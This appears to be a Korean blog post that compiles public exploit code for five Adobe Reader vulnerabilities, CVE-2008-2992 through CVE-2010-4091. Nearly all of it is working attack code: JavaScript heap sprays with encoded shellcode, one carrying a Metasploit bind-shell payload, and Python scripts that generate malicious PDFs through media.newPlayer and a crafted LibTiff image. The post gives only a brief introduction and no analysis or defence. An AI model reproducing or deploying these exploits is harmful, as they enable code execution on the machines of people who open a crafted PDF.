Adobe Reader 관련 취약점 정리

Adobe 관련 취약점들이 수도없이 쏟아져 나왔으며 계속해서 나오고 있다. 정리가 필요할 거 같아 정리해둔다.
빠진건 계속해서 업데이트 하고 우선 이것들만...... 이후엔 Sandbox 형태로 바뀔거라고 하던데 과연?

util.printf - CVE-2008-2992

Adobe Reader Javascript Printf Buffer Overflow Exploit
===========================================================
Reference: http://www.coresecurity.com/content/adobe-reader-buffer-overflow
CVE-2008-2992

Thanks to coresecurity for the technical background.

6Nov,2008: Exploit released by me

Credits: Debasis Mohanty
www.hackingspirits.com
www.coffeeandsecurity.com
===========================================================

//Exploit by Debasis Mohanty (aka nopsledge/Tr0y)
//www.coffeeandsecurity
//www.hackingspirits.com

// win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com

var payload = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64%u546d%u796e%u3179%u5947%u596f%u4646%u6633%u6b35%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f%u5176%u4945%u4e6f%u5130%u5376%u715a%u7274%u6246%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139%u5839%u4e4c%u4d69%u5337%u335a%u4e74%u4b69%u5652%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e%u7632%u6e4c%u6c73%u704d%u767a%u6c58%u4e6b%u4c4b%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075%u4b44%u794f%u5346%u706b%u7057%u7152%u5041%u4251%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f%u5070%u6e68%u5a4d%u5679%u6865%u334e%u3963%u586f%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b%u6b47%u4d4c%u6b53%u3174%u4974%u596f%u7046%u5952%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73%u684f%u3956%u386f%u4350");

//Heap Spray starts here - Kiddos don't mess up with this
var nop ="";
for (iCnt=128;iCnt>=0;--iCnt) nop += unescape("%u9090%u9090%u9090%u9090%u9090");
heapblock = nop + payload;
bigblock = unescape("%u9090%u9090");
headersize = 20;
spray = headersize+heapblock.length
while (bigblock.length<spray) bigblock+=bigblock;
fillblock = bigblock.substring(0, spray);
block = bigblock.substring(0, bigblock.length-spray);
while(block.length+spray < 0x40000) block = block+block+fillblock;
mem = new Array();
for (i=0;i<1400;i++) mem[i] = block + heapblock;

// reference snippet from core security
// http://www.coresecurity.com/content/adobe-reader-buffer-overflow
var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
util.printf("%45000f",num);

# milw0rm.com [2008-11-05]

Collab.getIcon - CVE-2009-0927

function spary()
{
  var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580");
  garbage = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090") + shellcode;
  nopblock = unescape("%u9090%u9090");
  headersize = 10;
  acl = headersize+garbage.length;
  while (nopblock.length<acl) nopblock+=nopblock;
  fillblock = nopblock.substring(0, acl);
  block = nopblock.substring(0, nopblock.length-acl);
  while(block.length+acl<0x40000) block = block+block+fillblock;
  memory = new Array();
  for (i=0;i<180;i++) memory[i] = block + garbage;
  var buffersize = 4012;
  var buffer = Array(buffersize);
  for (i=0; i<buffersize; i++)
  {
    buffer[i] = unescape("%0a%0a%0a%0a");
  }
  Collab.getIcon(buffer+\'_N.bundle\');
}
spary();

newplayer - CVE-2009-4324

#
#   Author : Ahmed Obied (ahmed.obied@gmail.com)
#
#   This program generates a PDF file that exploits a vulnerability (CVE-2009-4324) 
#   in Adobe Reader and Acrobat. The generated PDF file was tested using Adobe 
#   Reader 9.2.0 on Windows XP SP3. The exploit's payload spawns the calculator.
#
#   Usage  : python adobe_newplayer.py [output file name]
#   

import sys

class PDF:

    def __init__(self):
        self.xrefs = []
        self.eol = '\x0d\x0a'
        self.content = ''
        self.xrefs_offset = 0

    def header(self):
        self.content += '%PDF-1.1' + self.eol  

    def obj(self, obj_num, data):
        self.xrefs.append(len(self.content))
        self.content += '%d 0 obj' % obj_num
        self.content += self.eol + '<< ' + data + ' >>' + self.eol
        self.content += 'endobj' + self.eol

    def ref(self, ref_num):
        return '%d 0 R' % ref_num 

    def xref(self):
        self.xrefs_offset = len(self.content)
        self.content += 'xref' + self.eol
        self.content += '0 %d' % (len(self.xrefs) + 1)
        self.content += self.eol
        self.content += '0000000000 65535 f' + self.eol
        for i in self.xrefs:
            self.content += '%010d 00000 n' % i
            self.content += self.eol

    def trailer(self):
        self.content += 'trailer' + self.eol
        self.content += '<< /Size %d' % (len(self.xrefs) + 1)
        self.content += ' /Root ' + self.ref(1) + ' >> ' + self.eol
        self.content += 'startxref' + self.eol
        self.content += '%d' % self.xrefs_offset
        self.content += self.eol
        self.content += '%%EOF'

    def generate(self):   
        return self.content

class Exploit:

    def convert_to_utf16(self, payload):
        enc_payload = ''
        for i in range(0, len(payload), 2):
            num = 0
            for j in range(0, 2):
                num += (ord(payload[i + j]) & 0xff) << (j * 8)
            enc_payload += '%%u%04x' % num
        return enc_payload

    def get_payload(self):
        # win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub
        # http://metasploit.com
        payload  = '\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6f'
        payload += '\x02\xb1\x0e\x83\xeb\xfc\xe2\xf4\x93\xea\xf5\x0e\x6f\x02\x3a\x4b'
        payload += '\x53\x89\xcd\x0b\x17\x03\x5e\x85\x20\x1a\x3a\x51\x4f\x03\x5a\x47'
        payload += '\xe4\x36\x3a\x0f\x81\x33\x71\x97\xc3\x86\x71\x7a\x68\xc3\x7b\x03'
        payload += '\x6e\xc0\x5a\xfa\x54\x56\x95\x0a\x1a\xe7\x3a\x51\x4b\x03\x5a\x68'
        payload += '\xe4\x0e\xfa\x85\x30\x1e\xb0\xe5\xe4\x1e\x3a\x0f\x84\x8b\xed\x2a'
        payload += '\x6b\xc1\x80\xce\x0b\x89\xf1\x3e\xea\xc2\xc9\x02\xe4\x42\xbd\x85'
        payload += '\x1f\x1e\x1c\x85\x07\x0a\x5a\x07\xe4\x82\x01\x0e\x6f\x02\x3a\x66'
        payload += '\x53\x5d\x80\xf8\x0f\x54\x38\xf6\xec\xc2\xca\x5e\x07\x7c\x69\xec'
        payload += '\x1c\x6a\x29\xf0\xe5\x0c\xe6\xf1\x88\x61\xd0\x62\x0c\x2c\xd4\x76'
        payload += '\x0a\x02\xb1\x0e'
        return self.convert_to_utf16(payload)

    def get_exploit(self):
        exploit = '''

        function spray_heap()
        {
            var chunk_size, payload, nopsled;

            chunk_size = 0x8000;
            payload = unescape("<PAYLOAD>");
            nopsled = unescape("<NOP>");
            while (nopsled.length < chunk_size)
                nopsled += nopsled;
            nopsled_len = chunk_size - (payload.length + 20);        
            nopsled = nopsled.substring(0, nopsled_len);
            heap_chunks = new Array();
            for (var i = 0 ; i < <CHUNKS> ; i++)
                heap_chunks[i] = nopsled + payload;
        }    

        function trigger_bug()
        {
            util.printd("1.000000000000000000000000 : 0000000", new Date());
            try {
                media.newPlayer(null);
            } catch(e) {}
            util.printd("1.000000000000000000000000 : 0000000", new Date());
        }

        spray_heap();
        trigger_bug();

        '''
        exploit = exploit.replace('<PAYLOAD>', self.get_payload())
        exploit = exploit.replace('<NOP>', '%u0d0d%u0d0d')
        exploit = exploit.replace('<CHUNKS>', '1200')      
        return exploit   

def generate_pdf():
        exploit = Exploit()
        pdf = PDF()
        pdf.header()
        pdf.obj(1, '/Type /Catalog /Outlines ' + pdf.ref(2) + ' /Pages ' + pdf.ref(3) + ' /OpenAction ' + pdf.ref(5))
        pdf.obj(2, '/Type /Outlines /Count 0') 
        pdf.obj(3, '/Type /Pages /Kids [' + pdf.ref(4) + '] /Count 1')
        pdf.obj(4, '/Type /Page /Parent ' + pdf.ref(3) + ' /MediaBox [0 0 612 792]')
        pdf.obj(5, '/Type /Action /S /JavaScript /JS (%s)' % exploit.get_exploit())    
        pdf.xref()
        pdf.trailer()
        return pdf.generate()

def main():
    if len(sys.argv) != 2:
        print 'Usage: python %s [output file name]' % sys.argv[0]
        sys.exit(0)
    file_name = sys.argv[1]
    if not file_name.endswith('.pdf'):
        file_name = file_name + '.pdf'
    try:
        fd = open(file_name, 'w')
        fd.write(generate_pdf())    
        fd.close()
        print '[-] PDF file generated and written to %s' % file_name
    except IOError:
        print '[*] Error : An IO error has occurred'
        print '[-] Exiting ...'
        sys.exit(-1)

if __name__ == '__main__':
    main()

LibTiff Integer Overflow Code Execution - CVE-2010-0188

__doc__='''

Title: Adobe PDF LibTiff Integer Overflow Code Execution.
Product: Adobe Acrobat Reader
Version: <=8.3.0, <=9.3.0
CVE: 2010-0188
Author: villy (villys777 at gmail.com)
Site: http://bugix-security.blogspot.com/
Tested : succesfully tested on Adobe Reader 9.1/9.2/9.3 OS Windows XP(SP2,SP3)
------------------------------------------------------------------------
'''
import sys
import base64
import struct
import zlib
import StringIO

SHELLCODE_OFFSET=0x555
TIFF_OFSET=0x2038

# windows/exec - 227 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=process, CMD=calc.exe
buf = "\x2b\xc9\xd9\xc0\xd9\x74\x24\xf4\x5e\xb1\x33\xba\xd9\xb4"
buf += "\x0a\xbe\x31\x56\x15\x03\x56\x15\x83\x1f\xb0\xe8\x4b\x63"
buf += "\x51\x65\xb3\x9b\xa2\x16\x3d\x7e\x93\x04\x59\x0b\x86\x98"
buf += "\x29\x59\x2b\x52\x7f\x49\xb8\x16\xa8\x7e\x09\x9c\x8e\xb1"
buf += "\x8a\x10\x0f\x1d\x48\x32\xf3\x5f\x9d\x94\xca\x90\xd0\xd5"
buf += "\x0b\xcc\x1b\x87\xc4\x9b\x8e\x38\x60\xd9\x12\x38\xa6\x56"
buf += "\x2a\x42\xc3\xa8\xdf\xf8\xca\xf8\x70\x76\x84\xe0\xfb\xd0"
buf += "\x35\x11\x2f\x03\x09\x58\x44\xf0\xf9\x5b\x8c\xc8\x02\x6a"
buf += "\xf0\x87\x3c\x43\xfd\xd6\x79\x63\x1e\xad\x71\x90\xa3\xb6"
buf += "\x41\xeb\x7f\x32\x54\x4b\x0b\xe4\xbc\x6a\xd8\x73\x36\x60"
buf += "\x95\xf0\x10\x64\x28\xd4\x2a\x90\xa1\xdb\xfc\x11\xf1\xff"
buf += "\xd8\x7a\xa1\x9e\x79\x26\x04\x9e\x9a\x8e\xf9\x3a\xd0\x3c"
buf += "\xed\x3d\xbb\x2a\xf0\xcc\xc1\x13\xf2\xce\xc9\x33\x9b\xff"
buf += "\x42\xdc\xdc\xff\x80\x99\x13\x4a\x88\x8b\xbb\x13\x58\x8e"
buf += "\xa1\xa3\xb6\xcc\xdf\x27\x33\xac\x1b\x37\x36\xa9\x60\xff"
buf += "\xaa\xc3\xf9\x6a\xcd\x70\xf9\xbe\xae\x17\x69\x22\x1f\xb2"
buf += "\x09\xc1\x5f\x00"

class CVE20100188Exploit:
    def __init__(self,shellcode):
        self.shellcode = shellcode
        self.tiff64=base64.b64encode(self.gen_tiff())

    def gen_tiff(self):
        tiff =  '\x49\x49\x2a\x00'
        tiff += struct.pack("<L", TIFF_OFSET)

        tiff += '\x90' * (SHELLCODE_OFFSET)
        tiff += self.shellcode
        tiff += '\x90' * (TIFF_OFSET - 8 - len(buf) - SHELLCODE_OFFSET)

        tiff += "\x07\x00\x00\x01\x03\x00\x01\x00"
        tiff += "\x00\x00\x30\x20\x00\x00\x01\x01\x03\x00\x01\x00\x00\x00\x01\x00"
        tiff += "\x00\x00\x03\x01\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x01"
        tiff += "\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x11\x01\x04\x00\x01\x00"
        tiff += "\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00\x01\x00\x00\x00\x30\x20"
        tiff += "\x00\x00\x50\x01\x03\x00\xCC\x00\x00\x00\x92\x20\x00\x00\x00\x00"
        tiff += "\x00\x00\x00\x0C\x0C\x08\x24\x01\x01\x00\xF7\x72\x00\x07\x04\x01"
        tiff += "\x01\x00\xBB\x15\x00\x07\x00\x10\x00\x00\x4D\x15\x00\x07\xBB\x15"
        tiff += "\x00\x07\x00\x03\xFE\x7F\xB2\x7F\x00\x07\xBB\x15\x00\x07\x11\x00"
        tiff += "\x01\x00\xAC\xA8\x00\x07\xBB\x15\x00\x07\x00\x01\x01\x00\xAC\xA8"
        tiff += "\x00\x07\xF7\x72\x00\x07\x11\x00\x01\x00\xE2\x52\x00\x07\x54\x5C"
        tiff += "\x00\x07\xFF\xFF\xFF\xFF\x00\x01\x01\x00\x00\x00\x00\x00\x04\x01"
        tiff += "\x01\x00\x00\x10\x00\x00\x40\x00\x00\x00\x31\xD7\x00\x07\xBB\x15"
        tiff += "\x00\x07\x5A\x52\x6A\x02\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
        tiff += "\x00\x07\x58\xCD\x2E\x3C\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
        tiff += "\x00\x07\x05\x5A\x74\xF4\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
        tiff += "\x00\x07\xB8\x49\x49\x2A\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
        tiff += "\x00\x07\x00\x8B\xFA\xAF\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
        tiff += "\x00\x07\x75\xEA\x87\xFE\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
        tiff += "\x00\x07\xEB\x0A\x5F\xB9\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
        tiff += "\x00\x07\xE0\x03\x00\x00\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
        tiff += "\x00\x07\xF3\xA5\xEB\x09\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
        tiff += "\x00\x07\xE8\xF1\xFF\xFF\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
        tiff += "\x00\x07\xFF\x90\x90\x90\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
        tiff += "\x00\x07\xFF\xFF\xFF\x90\x4D\x15\x00\x07\x31\xD7\x00\x07\x2F\x11"
        tiff += "\x00\x07"
        return tiff

    def gen_xml(self):
        xml= '''<?xml version="1.0" encoding="UTF-8" ?> 
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config xmlns="http://www.xfa.org/schema/xci/1.0/">
<present>
<pdf>
<version>1.65</version> 
<interactive>1</interactive> 
<linearized>1</linearized> 
</pdf>
<xdp>
<packets>*</packets> 
</xdp>
<destination>pdf</destination> 
</present>
</config>
<template baseProfile="interactiveForms" xmlns="http://www.xfa.org/schema/xfa-template/2.4/">
<subform name="topmostSubform" layout="tb" locale="en_US">
<pageSet>
<pageArea id="PageArea1" name="PageArea1">
<contentArea name="ContentArea1" x="0pt" y="0pt" w="612pt" h="792pt" /> 
<medium short="612pt" long="792pt" stock="custom" /> 
</pageArea>
</pageSet>
<subform name="Page1" x="0pt" y="0pt" w="612pt" h="792pt">
<break before="pageArea" beforeTarget="#PageArea1" /> 
<bind match="none" /> 
<field name="ImageField1" w="28.575mm" h="1.39mm" x="37.883mm" y="29.25mm">
<ui>
<imageEdit /> 
</ui>
</field>
<?templateDesigner expand 1?> 
</subform>
<?templateDesigner expand 1?> 
</subform>
<?templateDesigner FormTargetVersion 24?> 
<?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?> 
<?templateDesigner Zoom 94?> 
</template>
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
<xfa:data>
<topmostSubform>
<ImageField1 xfa:contentType="image/tif" href="">'''+self.tiff64 +'''</ImageField1> 
</topmostSubform>
</xfa:data>
</xfa:datasets>
<PDFSecurity xmlns="http://ns.adobe.com/xtd/" print="1" printHighQuality="1" change="1" modifyAnnots="1" formFieldFilling="1" documentAssembly="1" contentCopy="1" accessibleContent="1" metadata="1" /> 
<form checksum="a5Mpguasoj4WsTUtgpdudlf4qd4=" xmlns="http://www.xfa.org/schema/xfa-form/2.8/">
<subform name="topmostSubform">
<instanceManager name="_Page1" /> 
<subform name="Page1">
<field name="ImageField1" /> 
</subform>
<pageSet>
<pageArea name="PageArea1" /> 
</pageSet>
</subform>
</form>
</xdp:xdp>

'''
        return xml

    def gen_pdf(self):
        xml = zlib.compress(self.gen_xml())
        pdf='''%PDF-1.6
1 0 obj 
<</Filter /FlateDecode/Length ''' + str(len(xml)) + '''/Type /EmbeddedFile>>
stream
''' + xml+'''
endstream 
endobj 
2 0 obj 
<</V () /Kids [3 0 R] /T (topmostSubform[0]) >>
endobj 
3 0 obj 
<</Parent 2 0 R /Kids [4 0 R] /T (Page1[0])>>
endobj 
4 0 obj 
<</MK <</IF <</A [0.0 1.0]>>/TP 1>>/P 5 0 R/FT /Btn/TU (ImageField1)/Ff 65536/Parent 3 0 R/F 4/DA (/CourierStd 10 Tf 0 g)/Subtype /Widget/Type /Annot/T (ImageField1[0])/Rect [107.385 705.147 188.385 709.087]>>
endobj 
5 0 obj 
<</Rotate 0 /CropBox [0.0 0.0 612.0 792.0]/MediaBox [0.0 0.0 612.0 792.0]/Resources <</XObject >>/Parent 6 0 R/Type /Page/PieceInfo null>>
endobj 
6 0 obj 
<</Kids [5 0 R]/Type /Pages/Count 1>>
endobj 
7 0 obj 
<</PageMode /UseAttachments/Pages 6 0 R/MarkInfo <</Marked true>>/Lang (en-us)/AcroForm 8 0 R/Type /Catalog>>
endobj 
8 0 obj 
<</DA (/Helv 0 Tf 0 g )/XFA [(template) 1 0 R]/Fields [2 0 R]>>
endobj xref
trailer
<</Root 7 0 R/Size 9>>
startxref
14765
%%EOF'''
        return pdf

if __name__=="__main__":
    print __doc__
    if len(sys.argv) != 2:
        print "Usage: %s [output.pdf]" % sys.argv[0]

    print "Creating Exploit to %s\n"% sys.argv[1]
    exploit=CVE20100188Exploit(buf)
    f = open(sys.argv[1],mode='wb')
    f.write(exploit.gen_pdf())
    f.close()
    print "[+] done !"

printSeps() - CVE-2010-4091

function exploit() {
    function sdlfkasdfiasdflaksdflaf(number) {
        large_hahacode = unescape("%u02ba%u0202%u8002%uffca%u6a42%u5843%ucd52%u5a2e%u053c%uf174%u8042%ufcfa%ueb77%u8fb8%u9050%u4058%u023b%uf075%ue2ff");
        var large_heap = unescape("%u1c1c%u0c1c");
        while (large_heap.length <= number) large_heap += large_heap;
        large_heap = large_heap.substring(0, 32768 - large_hahacode.length);
        memory = new Array();
        for (i = 0; i < 0x1024; i++) {
            memory[i] = large_heap + large_hahacode;
        }
        this.printSeps();
    }
    number = 10000;
    number = number * 3 + 2768;
    var a = app.viewerVersion;
    if ((a >= 8) || (a < 10)) sdlfkasdfiasdflaksdflaf(number) elseexit();
}

답글 남기기

이메일 주소를 발행하지 않을 것입니다. 필수 항목은 *(으)로 표시합니다